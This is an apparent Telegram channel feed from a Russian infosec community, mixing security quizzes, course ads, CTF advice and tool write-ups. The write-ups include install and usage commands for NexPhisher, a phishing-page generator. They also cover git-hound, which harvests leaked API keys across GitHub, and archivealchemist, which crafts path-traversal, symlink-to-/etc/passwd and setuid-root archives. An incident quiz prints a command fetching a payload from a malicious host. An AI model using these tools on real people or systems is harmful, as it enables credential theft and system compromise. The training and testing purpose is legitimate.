Codeby
35.9K subscribers
1.49K photos
92 videos
12 files
7.42K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🤔 Как хорошо вы умеете определять тип атаки по ее сценарию? Что ж, самое время себя проверить!

Злоумышленник осуществляет инъекцию произвольного JavaScript-кода через уязвимое поле пользовательского ввода (комментарии). Вредоносный скрипт сохраняется на сервере и исполняется в контексте сессии аутентифицированных пользователей при отображении заражённой страницы.

В результате:
• Происходит несанкционированное выполнение операций от имени жертвы.
• Возможна компрометация сессионных cookie (при отсутствии HttpOnly).
• Реализуется цепочка атак для эскалации привилегий.


🟧 Выбирайте ответ!

🟧 Бонусный вопрос: Какие два основных метода защиты наиболее эффективны против этой уязвимости?
Please open Telegram to view this post
VIEW IN TELEGRAM
👍155🔥3
К какому типу уязвимостей относится данная атака?
Anonymous Poll
74%
XSS (Cross-Site Scripting)
13%
SSRF (Server-Side Request Forgery)
8%
RCE (Remote Code Execution)
5%
IDOR (Insecure Direct Object Reference)
👍13👎85🔥4
💻 git-hound

Инструмент для сбора информации, использующий GitHub Code Search API. GitHound ищет открытые ключи API и другую конфиденциальную информацию на GitHub с помощью поиска кода на GitHub, сопоставления шаблонов и поиска в истории коммитов. В отличие от других инструментов он ищет по всему GitHub, а не только в определённых репозиториях, у пользователей или в организациях.

Доступны результаты поиска в режиме реального времени с помощью GitHound Explore или с помощью флага --dashboard.

🚀 Установка
Скачайте последнюю версию со страницы релизов.
Распаковываем архив:
unzip git-hound_linux_amd64.zip

Добавляем API-токен github в config.yml

В качестве альтернативы можно использовать переменные окружения, которые будут переопределять значения в config.yml:
GITHOUND_GITHUB_TOKEN: Устанавливает токен доступа к API GitHub.
GITHOUND_INSERT_KEY: Устанавливает ключ вставки GitHoundExplore для функции --dashboard.

GitHound использует базу данных регулярных выражений для ключей API, поддерживаемую авторами Gitleaks.

📖 Принцип работы и использование
GitHound находит ключи API с помощью комбинации точных регулярных выражений для распространённых сервисов, таких как Slack и AWS, и универсального регулярного выражения API с учётом контекста. Это позволяет находить длинные строки, похожие на ключи API, которые окружены ключевыми словами, такими как Authorization и «API-Token». GitHound предполагает, что это ложные срабатывания, а затем проверяет их легитимность с помощью энтропии Шеннона, проверки слов из словаря, расчёта уникальности и обнаружения кодировки.
Далее он выводит результаты с высокой степенью достоверности. Для файлов, в которых кодируются секреты, он декодирует строки в формате base64 и ищет в закодированных строках ключи API.

echo "\"uberinternal.com\"" | githound --dig-files --dig-commitst --threads 100

--dig-files - Просматривает файлы репозитория, чтобы найти больше секретов;
--dig-commits - Просматривает историю коммитов, чтобы найти больше секретов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥126👍5
В новом видео — разбор лабораторной работы от Дениса Соколова: пентест WordPress от первоначального доступа до повышения привилегий.
Сканирование, эксплуатация, эскалация — всё пошагово, на основе реальных техник, которые используются в профессиональных тестах на проникновение.

📺 Смотреть на YouTube
™️ Смотреть в VK

Такие практикумы — это лишь часть полноценной программы. Реальные техники, настоящая цель, никакой воды.
🟧 Запись на курс «Профессия Пентестер» до 3 июля.
Начать обучение сейчас.

🚀 @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍9🔥8😁1
Фрустрация в CTF: почему опускаются руки и как с этим бороться

🟧Каждый, кто участвовал в CTF, знает это чувство: задача кажется нерешаемой, время уходит, а флаг так и не поддается.

В новой статье разбираем:
🟧Почему возникает фрустрация в CTF (и почему это нормально)
🟡Практические способы выйти из ступора
🟡Как сохранить мотивацию, даже когда всё кажется безнадежным
🟡Где искать помощь и вдохновение

🟧Советы подойдут и новичкам, и опытным игрокам. Главное — понять: трудности не означают поражение.

🟧 Читайте в статью, применяйте рекомендации, и пусть ни один флаг не устоит!
Please open Telegram to view this post
VIEW IN TELEGRAM
18👍13🔥11
🚩 Новые задания на платформе HackerLab!

👩‍💻 Категория Pentest MachinesПоследний танец

🔎 Категория OSINTНародный автомобиль

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥159👍7
😶‍🌫️ Забыл всё, чему учился по ИБ? Это не провал — это сигнал к действию!

В нашей новой статье «Я ничего не помню: как не забыть выученное. Методы обучения для информационной безопасности» вы узнаете:

✔️ Почему стандартные подходы не работают — и как мозг теряет новую инфу
✔️ Эффективные техники запоминания: интервальное повторение, карточки, мнемоника
✔️ Как превратить знания в привычку: как организовать расписание, работать с микрозадачами, фиксировать успехи
✔️ Практические советы для профи ИБ: как учить OSINT‑инструменты, CTF‑задачи, анализ уязвимостей — без выгорания

Статья — без воды, с реальными техниками, ссылками и примерами для применения уже сегодня.

➡️ Читайте и закрепляйте свои знания навсегда!
Please open Telegram to view this post
VIEW IN TELEGRAM
16👍12🔥8👎3
🔍 Киберрасследование: Кто украл данные?

Вы — SOC-аналитик. В сети компании обнаружена утечка конфиденциальных файлов. Вот что удалось собрать:

*️⃣В 09:15 сотрудник получил письмо с темой «Договор о защите информационных систем №-4513 на подпись» от якобы доверенного контрагента.

*️⃣В 09:20 он открыл вложение — файл contract_scanned.exe, маскирующийся под PDF.

*️⃣В 09:22 на его ПК (Windows 10) запустился процесс msbuild.exe с необычными аргументами:

/tmp:7a3f1 /payload:http://malware[.]xyz/get.dll

*️⃣ В 09:25 этот процесс подключился к IP 91.234.18.77 (порт 8443) и начал массово копировать файлы из сетевой папки \\NAS\Information\.

⬇️ Выбирайте ответ!

💬 Какие индикаторы компрометации (IOCs), помимо указанных в описании инцидента, можно выделить для дальнейшего поиска подобных атак в сети компании? Делитесь своими идеями!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔10👍76
Какая тактика MITRE ATT&CK здесь применена? 🟧
Anonymous Poll
19%
T1195
45%
T1204.002
23%
T1059.001
13%
T1134
🔥13👍85👎2🤔1😱1
NexPhisher

NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.

💡Основные функции:
⏺️Выбор нескольких сервисов - Утилита имеет большой выбор, до 30 сервисов.
⏺️Понятный интерфейс - Программа очень простая и справится каждый.
⏺️Большой выбор хоста - есть известные Ngrok, Serveo и новые LocalHostRun, LocalXpose.

📎Установка:
git clone https://github.com/htr-tech/nexphisher.git

cd nexphisher

./setup


📌Использование:
1️⃣Запуск утилиты
bash nexphisher
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍8🔥5😭1
Киберпреступления оставляют цифровые следы. Научитесь их находить.

Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.

Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!

⌨️ Регистрация здесь

Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО

Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику

Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас

🚀 @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍9🔥7😁1
⚡️ Угадай уязвимость по коду:

В приложении есть следующий код:
SELECT * FROM users WHERE username = '" + userInput + "' AND password = '" + userPassword + "';


К какой уязвимости подвержен данный код?
1️⃣ SQL Injection
2️⃣ Command Injection
3️⃣ Code Injection
4️⃣ Bruteforce

Пиши свой ответ в комментарии👇
Please open Telegram to view this post
VIEW IN TELEGRAM
😁33👏7💯7❤‍🔥6👎3
Как построить успешную карьеру в тестировании на проникновение? Всё начинается с прочного базиса — тех знаний, без которых даже самые мощные инструменты останутся бесполезными.

В статье рассмотрим:
Как эффективно изучить Linux, сети и Python
Где получить реальную практику
Ошибки новичков и как их избежать

Среди обилия информации системный подход к обучению становится ключевым.

Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
Освоить практические навыки пентеста
Подготовиться к экзамену OSCP
Получить практические задания с экспертной проверкой

➡️ Читайте полный гайд
Please open Telegram to view this post
VIEW IN TELEGRAM
💯9❤‍🔥5👍4👏43🔥2
archivealchemist — инструмент для создания специально разработанных архивов для тестирования уязвимостей при извлечении данных.

❗️Характеристики
⏺️Создание ZIP- и TAR-архивов с вредоносными шаблонами;
⏺️Поддержка атак с обходом пути;
⏺️Поддержка символических и жестких ссылок;
⏺️Возможность устанавливать специальные биты разрешений (setuid, setgid, sticky bit);
⏺️Точный контроль над атрибутами файлов (режим, владелец, группа, время изменения);
⏺️Команды манипулирования: добавить, заменить, дополнить, изменить;
⏺️Вспомогательные команды: извлечение, список, чтение;
⏺️Создание файлов polyglot (дополните архив данными + настройте заголовки).

⬇️Установка
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:
git clone https://github.com/avlidienbrunn/archivealchemist
cd archivealchemist
chmod +x archive-alchemist.py
sudo ln -s $(pwd)/archive-alchemist.py /usr/local/bin/archive-alchemist


⚡️ Использование
Архив с полезной нагрузкой для обхода путей:
archive-alchemist zipslip.zip add "../../../tmp/evil.txt" --content "I escaped the extraction directory!"

Архив с символической ссылкой, указывающей на конфиденциальный файл:
archive-alchemist symlink_attack.tar -t tar add .bashrc --symlink "/etc/passwd"

Создание исполняемого файла с правами суперпользователя:
archive-alchemist setuid_attack.tar -t tar add exploit --content "#!/bin/sh\nwhoami" --mode 0755 --setuid --uid 0

Создание файла, который является допустимым ZIP-файлом и начинается с магических байтов GIF
archive-alchemist polyglot.gif add payload.txt --content "hello there"


Поддерживает следующие команды
🌟add - добавление файлов, каталогов, символических или жестких ссылок в архив;
🌟replace - замена существующих файлов или каталогов в архиве;
🌟append - добавление дополнительного содержимого к существующим файлам в архиве;
🌟modify - изменение атрибутов файла или преобразование файлов в символические/жесткие ссылки;
🌟remove/rm - удаление файлов, каталогов, символических или жестких ссылок из архива;
🌟list/ls - отображение содержимого архива;
🌟extract - извлечение файлов из архива в файловую систему;
🌟read/cat - чтение файла из архива в стандартный вывод;
🌟polyglot - добавление содержимое в архив, сохраняя его валидным.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥128👍8
О каком типе атаки идет речь?
Anonymous Poll
7%
SQL Injection
41%
Phishing
38%
CSRF (Cross-Site Request Forgery)
14%
Cross-Site Scripting (XSS)
😁15👍43🔥2😭2
⚡️ Угадайте уязвимость по описанию:

Злоумышленник отправляет жертве ссылку, которая выглядит как легитимный запрос на изменение пароля. Когда жертва кликает по ссылке, ее браузер выполняет действие от ее имени без ее ведома.

👇 Выбирайте вариант ответа!
Please open Telegram to view this post
VIEW IN TELEGRAM
😁12👍62🔥2👎1
🌐 Setezor — швейцарский нож для анализа и проектирования сетевой инфраструктуры. Данный инструмент будет полезен пентестерам, сетевикам, системным администраторам.

😮 Функционал
⏺️Работа с веб-интерфейсом;
⏺️Разделение на проекты;
⏺️Табличное представление данных с возможность применения фильтров, экспорт в формате электронной таблицы;
⏺️Генерация снимка экрана веб-ресурса;
⏺️Поиск программного обеспечения по узлам сети;
⏺️Активное и пассивное сканирование с использованием nmap, masscan и scapy;
⏺️Парсинг pcap-файлов, xml-логов сканирования nmap, xml/list/json-логов сканирования masscan;
⏺️Получение информации организовано в виде задач, при изменении статуса задачи всплывает уведомление;
⏺️Получение списка уязвимостей для конкретного ПО посредством интеграции с search-vulns;
⏺️Формирование отчёта по найденным уязвимостям;
⏺️Поиск сетевых узлов по протоколу SNMP и сбор установленного программного обеспечения;
⏺️Автоматическое построение карты сети на L3 уровне;
⏺️Поиск субдоменов через DNS;
⏺️Получение SSL сертификата;
⏺️Получение детальной информации о регистре домена;
⏺️HTTP REST API – унифицированный веб-интерфейс для взаимодействия с клиентской частью приложения и интеграциями с другими информационными системами.

Установка и запуск
Скачать установочный DEB-пакет. При установке убедиться, что вы расположены в директории с DEB-пакетом, иначе прописать полный путь. Далее объявляем переменные окружения:
sudo apt install ./setezor_<версия>.deb
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef

Запускаем сервер командой setezor.
Запускаем агента командой setezor -s -p <port>

На странице Settings находятся все агенты проекта и сервер. Для создания нового агента нажать на Add agent.

Для выполнения необходимых задач выбираем нужные параметры и агента, который будет выполнять действие.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍136🔥6
💥 67% всех утечек данных — из-за SQL-инъекций.

Если вы пентестер (или хотите им стать), вы обязаны уметь находить SQL-уязвимости. Это прямой путь к базе данных, админке, а иногда — к полному контролю над системой.

Где этому научиться?
На практическом курсе по SQL-инъекциям от Академии Кодебай!
🟧Запись на поток до 3 июля, а сейчас действует скидка 10% по промокоду SQL10!

На курсе вы научитесь:
🟧 понимать структуру SQL и писать запросы с нуля
🟧 внедрять SQL-код в уязвимые формы, параметры, cookies
🟧 раскручивать SQLi вручную и через Burp/SQLmap
🟧 закрывать такие уязвимости на бэке

Аналогов по объёму практики в СНГ и EN-сегменте просто нет.

🟧 Регистрируйтесь, пока действует скидка

🚀 По всем вопросам пишите @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥6👍4
🟧 Готовы к своему первому CTF? Пошаговый план для новичков!

Хотите попробовать свои силы в capture the flag, но не знаете, с чего начать? Это не «еще один гайд», а практический маршрут по всем ключевым этапам:

🟧 Что такое CTF - терминология, функционал и форматы задач
🟧 OSINT-разведка - как собирать важную информацию перед атакой
🟧 Стеганография - от спрятанных данных в картинках до HEX-редакторов
🟧 Реверс-инжиниринг, анализ трафика и работа с Wireshark для реального понимания системы …и многое другое по алгоритму: сбор → анализ → эксплуатация!

Это не только теория, а «генератор навыков» для реальных CTF — разобранных подробно и с понятными примерами. Возьмите свое: пошаговый план, инструменты и первые практические кейсы — идеально для старта и прокачки в ИБ.

🟧 Читать полностью: «Как подготовиться к своему первому CTF: пошаговый план для новичков»
Please open Telegram to view this post
VIEW IN TELEGRAM
18👍11❤‍🔥7👎1
🙃 ffufai

Инструмент, являющийся оболочкой на основе ИИ для популярного фаззера ffuf для более эффективного обнаружения уязвимостей. Автоматически предлагает расширения файлов для фаззинга на основе целевого URL-адреса и его заголовков, используя модели OpenAI GPT или Anthropic Claude. Полностью совместим с ffuf и работает с такими же параметрами.

📕 Возможности
⏺️"Умный" фаззинг веб-приложений с помощью ИИ;
⏺️Генерация подсказок для дальнейшего тестирования;
⏺️Идентификация проблем безопасности, которые могут быть упущены традиционными инструментами.

🐍 Установка
Клонируем репозиторий, переходим в папку с проектом, устанавливаем необходимые зависимости:
git clone https://github.com/jthack/ffufai
cd ffufai
pip install requests openai anthropic

Далее делаем скрипт исполняемым и для удобства использования ffufai из любого места, создаем символическую ссылку в каталоге, который находится в вашей переменной PATH:
chmod +x ffufai.py
sudo ln -s /<your_path>/ffufai.py /usr/local/bin/ffufai

Финальным шагом необходимо настроить ключ API в качестве переменной окружения для OpenAI или Anthropic's Claude AI:
export OPENAI_API_KEY='your-api-key-here'
export ANTHROPIC_API_KEY='your-api-key-here'


✏️ Использование
Использование идентичное обычному ffuf. В случае если символическая ссылка отсутствует вызывать необходимо с помощью python3 ffufai.py, иначе ffufai:

python3 ffufai.py -u https://example.com/FUZZ -w /path/to/wordlist.txt
#or
ffufai -u https://example.com/FUZZ -w /path/to/wordlist.txt


ffufai требует, чтобы ключевое слово FUZZ находилось в конце пути URL-адреса для точного определения расширения. Если это не так, вы получите предупреждение.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1511🔥10